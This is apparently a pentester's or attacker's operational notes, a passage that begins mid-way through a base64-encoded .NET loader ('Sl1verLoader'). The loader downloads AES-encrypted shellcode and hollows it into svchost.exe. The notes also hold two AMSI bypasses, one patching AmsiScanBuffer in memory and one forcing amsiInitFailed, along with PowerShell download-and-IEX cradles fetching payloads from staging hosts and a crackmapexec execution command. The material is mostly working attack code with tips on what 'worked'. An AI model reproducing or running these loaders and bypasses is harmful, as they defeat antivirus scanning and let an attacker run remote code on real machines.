AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAPAMAAAAAAAAAAAAAPAM0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAHgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAABEAA4AAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEQAEgABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAGQAbABsAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMgA0AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABMABIAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAGQAbABsAAAAPAAOAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://192.168.45.157:8443/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
- Save it as SliverPhollow.txt
AMSI bypass script
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$test = [Byte[]](0x61, 0x6d, 0x73, 0x69, 0x2e, 0x64, 0x6c, 0x6c)
$LoadLibrary = [Win32]::LoadLibrary([System.Text.Encoding]::ASCII.GetString($test))
$test2 = [Byte[]] (0x41, 0x6d, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6e, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72)
$Address = [Win32]::GetProcAddress($LoadLibrary, [System.Text.Encoding]::ASCII.GetString($test2))
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0x31, 0xC0, 0x05, 0x78, 0x01, 0x19, 0x7F, 0x05, 0xDF, 0xFE, 0xED, 0x00, 0xC3)
#0: 31 c0 xor eax,eax
#2: 05 78 01 19 7f add eax,0x7f190178
#7: 05 df fe ed 00 add eax,0xedfedf
#c: c3 ret
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, $Patch.Length)
(New-Object System.Net.WebClient).DownloadString('http://10.15.15.207:80/SliverPhollow.txt') | IEX
- Last line will call to our staged listener.
Host both the files on your http server
pyhton3 -m http.server 80
Execute our powershell command
This worked on new amsi
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/SliverPhallowx64') | IEX
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
"powershell \"IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt')\""
cme smb 172.16.181.168 -u pete --use-kcache --amsi-bypass sliver/am.txt -X ls
For initital shell the large1.ps1 works as well
try two three times powershell -ep bypass is important
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
x86
$encodeStr = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABz/L/kAAAAAAAAAAOAAAiELATAAAB4AAAAGAAAAAAAA4jwAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJA8AABPAAAAAEAAAJgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB0PAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA6BwAAAAgAAAAHgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgDAAAAQAAAAAQAAAAgAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAJAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADEPAAAAAAAAEgAAAACAAUA/CQAAHgXAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwCgBMAQAAAQAAEQAoEQAACn4+AAAEJS0XJn49AAAE/gYQAAAGcxIAAAolgD4AAAQoEwAACnQfAAABKBQAAAoAcw0AAAYKBgJvFQAACgtzFgAACgwFLAcOBBT+AysBFhMREREsQQAfEBMSKxMACAcREpFvFwAACgAAERIXWBMSERIHjmkXWf4CFv4BExMREy3bCG8YAAAKDQkFDgQoBwAABhMEACsFAAcTBAARBAQoBgAABhMFAxMGEQWOaRMHcwsAAAYTCBEIFn02AAAEcgEAAHARBigZAAAKEwoRChQUFBcafhoAAAoUEQgSCSgBAAAGEwsRCXsIAAAEEwwRDBZzGwAAChEHfgQAAAR+AwAABCgCAAAGEw0WEw4SDxEFjmkoGwAAChEMEQ0RBREPEQ4oAwAABhMQEQwWcxsAAAoWEQ0WcxsAAAoWFnMbAAAKKAQAAAYmKwAqGzACAOsAAAACAAARABQKA3IrAABwKBwAAAoLByxbAHMdAAAKDAACcx4AAAoNAAkWcx8AAAoTBAARBAhvIAAACgAA3g0RBCwIEQRvIQAACgDcAN4LCSwHCW8hAAAKANwIbyIAAAoKAN4LCCwHCG8hAAAKANwGEwUrewNyPQAAcCgcAAAKEwYRBixkAHMdAAAKEwcAAnMeAAAKEwgAEQgWcyMAAAoTCQARCREHbyAAAAoAAN4NEQksCBEJbyEAAAoA3ADeDREILAgRCG8hAAAKANwRB28iAAAKCgDeDREHLAgRB28hAAAKANwGEwUrBgACEwUrABEFKgABTAAAAgArAA04AA0AAAAAAgAhACdIAAsAAAAAAgAZAERdAAsAAAAAAgCaAA6oAA0AAAAAAgCPACm4AA0AAAAAAgCGAErQAA0AAAAAGzAEAIwAAAADAAARAAMKBAsoJAAACgwACAZvJQAACgAIB28mAAAKAAgXbycAAAoACAhvKAAACghvKQAACm8qAAAKDQJzHgAAChMEABEECRdzKwAAChMFABEFAhYCjmlvLAAACgARBG8iAAAKEwbeJREFLAgRBW8hAAAKANwRBCwIEQRvIQAACgDcCCwHCG8hAAAKANwRBioBKAAAAgBLABlkAA0AAAAAAgA/ADJxAA0AAAAAAgALAHN+AAsAAAAAIgIoLQAACgAqSh9AgAMAAAQgABAAAIAEAAAEKroCFn0FAAAEAn4aAAAKfQYAAAQCFn0HAAAEAigtAAAKAAACAigBAAArfQUAAAQqABMwAgCvAAAAAAAAAAIWfSsAAAQCfhoAAAp9LAAABAJ+GgAACn0tAAAEAn4aAAAKfS4AAAQCFn0vAAAEAhZ9MAAABAIWfTEAAAQCFn0yAAAEAhZ9MwAABAIWfTQAAAQCFn01AAAEAhZ9NgAABAIWfTcAAAQCFn04AAAEAn4aAAAKfTkAAAQCfhoAAAp9OgAABAJ+GgAACn07AAAEAn4aAAAKfTwAAAQCKC0AAAoAAAICKAIAACt9KwAABCoAEzACABsAAAAEAAARAAIDKC8AAAoKBiCA8PoCbzAAAAoABgsrAAcqIgIoMQAACgAqLnMPAAAGgD0AAAQqIgIoLQAACgAqChcqQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAA/AcAACN+AABoCAAAqAsAACNTdHJpbmdzAAAAABAUAABIAAAAI1VTAFgUAAAQAAAAI0dVSUQAAABoFAAAEAMAACNCbG9iAAAAAAAAAAIAAAFXHQIcCQoAAAD6ATMAFgAAAQAAAC0AAAAIAAAAPgAAABAAAAAqAAAAMQAAAB4AAAAQAAAABAAAAAEAAAABAAAABAAAAAEAAAACAAAABgAAAAIAAAAAADkHAQAAAAAABgC9BRgJBgAqBhgJBgDSBOIIDwA4CQAABgD6BC4IBgCRBS4IBgByBS4IBgARBi4IBgDdBS4IBgD2BS4IBgARBS4IBgDmBPkIBgDEBPkIBgBVBS4IBgAsBZEGBgBwCpcHCgCMCoEKBgAnAHUDBgCCB3cBCgBcBwMICgB3BwMIBgD1CDULBgDGBzULBgBqBzULBgBUBJcHBgCuBZcHBgDXB5cHCgCvCoEKCgC5BpcHBgCpBBgJCgC9BpELBgB3BFcJCgDzB1cJCgAGCpELCgB/CIEKBgCaBJcHBgCrBpcHBgDbCJcHBgCIB3cBCgD5AwMIBgAJBJcHBgCeBzULBgDcAzULBgDoAzULBgAxB/kIAAAAAFgAAAAAAAEAAQABABAAjwdkCEEAAQABAAoAEACsCQAAQQAFAAoACgEQABsIAABlAAgACwACAQAAzwkAAG0ADAALAAoAEABJCAAAQQArAAsAAgAQAMYKAABFAD0ADAADIRAAcQMAAEEAPQAOABEAHgupAREA7gKpAREA5ACsAREAjgKsAQYAsgavAQYAtgh3AAYAFQSyAQYAJgp3AAYAxQN3AAYApgOvAQYAmwOvAQYGSwOsAVaAaAK1AVaAdgK1AVaAigC1AVaAPgK1AVaA0QC1AVaAKAK1AVaAxgG1AVaA8gG1AVaA2gG1AVaAgQG1AVaAtgK1AVaAQQG1AVaAKwG1AVaAtgG1AVaAIgK1AVaABgK1AVaAFwO1AVaALwO1AVaATwK1AVaA0QK1AVaAWQG1AVaAmwC1AVaAcAC1AVaACgG1AVaAtwC1AVaAAgO1AVaAmgG1AVaA+wC1AVaApwG1AVaAmQK1AQYAZQOvAQYA0QN3AAYAWgh3AAYAJAR3AAYAEwOvAQYARwOvAQYAWwavAQYAYwavAQYA6gmvAQYA+AmvAQYARQWvAQYA4gmvAQYA+wq5AQYAPAC5AQYASAB3AAYA2wp3AAYA5Qp3AAYAnwh3ADYAVAC8ARYAAQDAAQAAAACAAJYgYQDEAQEAAAAAAIAAliAHC9gBCwAAAAAAgACWIF8L4QEQAAAAAACAAJEgsgPrARUAUCAAAAAAlgBIBvYBHACoIQAAAACWAF4KAQIhAOwiAAAAAJYApAoJAiMArCMAAAAAhhipCAYAJgC1IwAAAACRGK8IFAImAMgjAAAAAIYYqQgGACYA+CMAAAAAhhipCAYAJgC0JAAAAADEAKwKAwEmANskAAAAAIYYqQgGACcA5CQAAAAAkRivCBQCJwDwJAAAAACGGKkIBgAnAPkkAAAAAIMACwAYAicAAAABACwEAAACAD4EAAADAJgJAAAEAIUJAAAFAEcJAAAGAL8JAAAHAJYKAAAIAHILAQAJAEcIAgAKABkIAAABACYKAAACAD0KAAADAHcGAAAEAF4EAAAFAHcKAAABACYKAAACAC8KAAADAHgIAAAEAHcGAAAFANwHAAABACYKAAACAIUJAAADAGsGAAAEAEcKAAAFAJMIAAAGAL8JAAAHAJADAAABAFgHAAACAFILAAADALEHAAAEAB4LAAAFAO4CAAABAGADAAACALEHAAABAPAKAAACAB4LAAADAO4CAAABAFYKAAABAHEIAAACAIcEAAADAP0HAAAEABYKCQCpCAEAEQCpCAYAGQCpCAoAKQCpCBAAMQCpCBAAOQCpCBAAQQCpCBAASQCpCBAAUQCpCBAAWQCpCBAAYQCpCBUAaQCpCBAAcQCpCBAAeQCpCBAA0QCpCAYA8QCpCAYAGQHhBjwA+QCpCEEAIQFMBEcAGQEJB1MAiQBTA1kADACpCAYADADNA2UADAAWC2sAKQFpCnEAMQFVCHcAMQGpCAEAKQGFC48AmQCpCAYAmQCpCJUAoQCpCJsAOQFACKUASQFvBAYAmQAWC6wAqQCpCJsAsQCTBMIAUQEtC5UAUQH7ApUAUQGFBscAUQElC6wAUQH0AqwAUQHLCM4AwQCpCNcAOQGjBOMAgQCpCAYAaQF+BusAiQCsCgMB4QC6CgEAiQCpCAYACQA0ABMBCQA4ABgBCQA8AB0BCQBAACIBCQBEACcBCQBIACwBCQBMADEBCQBQADYBCQBUADsBCQBYAEABCQBcAEUBCQBgAEoBCQBkAE8BCQBoAFQBCQBsAFkBCQBwAF4BCQB0AGMBCQB4AGgBCQB8AG0BCQCAAHIBCQCEAHcBCQCIAHwBCQCMAIEBCQCQAIYBCQCUAIsBCQCYAJABCQCcAJUBCQCgAJoBCQCkAJ8BCQCoAKQBLgALACYCLgATAC8CLgAbAE4CLgAjAFcCLgArAGoCLgAzAGoCLgA7AGoCLgBDAFcCLgBLAHACLgBTAGoCLgBbAGoCLgBjAIgCLgBrALICLgBzAL8CowB7ABMBAwGDABMBGgB6ALEA/ABLB18AAAEDAGEAAQAAAQUABwsBAAABBwBfCwEAAAEJALIDAQAEgAAAAQAAAAAAAAAAAAAAAAAuAAAABAAAAAAAAAAAAAAACgFoAwAAAAAEAAAAAAAAAAAAAAAKAZcHAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAF0A8gBdAPcAAAAAAAA8PjlfXzEyXzAAPERvd25sb2FkQW5kRXhlY3V0ZT5iX18xMl8wAExpc3RgMQBDbGFzc0xpYnJhcnkxAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADw+OQA8TW9kdWxlPgBDcmVhdGVQcm9jZXNzQQBDUkVBVEVfQlJFQUtBV0FZX0ZST01fSk9CAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAENSRUFURV9ERUZBVUxUX0VSUk9SX01PREUAQ1JFQVRFX05FV19DT05TT0xFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUFJPRklMRV9LRVJORUwAQ1JFQVRFX1BSRVNFUlZFX0NPREVfQVVUSFpfTEVWRUwAQ1JFQVRFX1NIQVJFRF9XT1dfVkRNAENSRUFURV9TRVBBUkFURV9XT1dfVkRNAFBST0NFU1NfTU9ERV9CQUNLR1JPVU5EX0JFR0lOAFN5c3RlbS5JTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklUWV9DTEFTUwBERVRBQ0hFRF9QUk9DRVNTAENSRUFURV9QUk9URUNURURfUFJPQ0VTUwBERUJVR19QUk9DRVNTAERFQlVHX09OTFlfVEhJU19QUk9DRVNTAE1FTV9DT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAEFFU0lWAGdldF9JVgBzZXRfSVYAQ1JFQVRFX05PX1dJTkRPVwBkd1gASU5IRVJJVF9QQVJFTlRfQUZGSU5JVFkASU5IRVJJVF9DQUxMRVJfUFJJT1JJVFkAZHdZAHZhbHVlX18ARG93bmxvYWREYXRhAGRhdGEAY2IAbXNjb3JsaWIAPD5jAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABBZGQAbHBSZXNlcnZlZABQYWRkaW5nTW9kZQBDcnlwdG9TdHJlYW1Nb2RlAENvbXByZXNzaW9uTW9kZQBJRGlzcG9zYWJsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAQ29tYmluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBEaXNwb3NlAFg1MDlDZXJ0aWZpY2F0ZQBjZXJ0aWZpY2F0ZQBDcmVhdGUARGVsZWdhdGUAV3JpdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAZHdGaWxsQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAERvd25sb2FkQW5kRXhlY3V0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBzZXRfUGFkZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBMZW5ndGgAVXJpAFJlbW90ZUNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAGdldF9TZXJ2ZXJDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBzZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sATWFyc2hhbABDbGFzc0xpYnJhcnkxLmRsbABrZXJuZWwzMi5kbGwAdXJsAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAEdaaXBTdHJlYW0ATWVtb3J5U3RyZWFtAFByb2dyYW0AU3lzdGVtAFN5bW1ldHJpY0FsZ29yaXRobQBDb21wcmVzc2lvbkFsZ29yaXRobQBJQ3J5cHRvVHJhbnNmb3JtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBYNTA5Q2hhaW4AY2hhaW4AU3lzdGVtLklPLkNvbXByZXNzaW9uAGxwUHJvY2Vzc0luZm9ybWF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENvcHlUbwBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAFNsMXZlckxvYWRlcgBzZW5kZXIAYnVmZmVyAFNlcnZpY2VQb2ludE1hbmFnZXIAbHBQYXJhbWV0ZXIAaFN0ZEVycm9yAC5jdG9yAC5jY3RvcgBscFNlY3VyaXR5RGVzY3JpcHRvcgBDcmVhdGVEZWNyeXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBBZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAYkluaGVyaXRIYW5kbGVzAFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuWDUwOUNlcnRpZmljYXRlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBTZWN1cml0eUF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAENyZWF0ZVByb2Nlc3NGbGFncwBkd0ZsYWdzAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBTc2xQb2xpY3lFcnJvcnMAc3NsUG9saWN5RXJyb3JzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAGFkZHJlc3MARGVjb21wcmVzcwBDb25jYXQAT2JqZWN0AGZsUHJvdGVjdABTeXN0ZW0uTmV0AFdlYkNsaWVudABscEVudmlyb25tZW50AERlY3J5cHQAR2V0V2ViUmVxdWVzdABzZXRfVGltZW91dABXZWJDbGllbnRXaXRoVGltZW91dABoU3RkSW5wdXQAaFN0ZE91dHB1dABjaXBoZXJ0ZXh0AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFRvQXJyYXkAQUVTS2V5AGdldF9LZXkAc2V0X0tleQBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5AFRhcmdldEJpbmFyeQBXcml0ZVByb2Nlc3NNZW1vcnkAbHBDdXJyZW50RGlyZWN0b3J5AG9wX0VxdWFsaXR5AFN5c3RlbS5OZXQuU2VjdXJpdHkAAAAAAClDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAABFkAGUAZgBsAGEAdABlADkAAAlnAHoAaQBwAAAAw5IdYhPzZkWmxmPdud0FrwAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECIQcUEkUdBRUSSQEFHQUdBR0FDggSGBEQDhgYGAgYAgIIAgQAABJ9BSACARwYCwACEoCREoCREoCRBQABARJ9BSABHQUOBRUSSQEFBSABARMABSAAHRMABQACDg4OAgYYFAcKHQUCEk0STRJRHQUCEk0STRJVBQACAg4OBSABAR0FCSACARKAnRGAoQYgAQESgJ0EIAAdBRAHBx0FHQUSWRJd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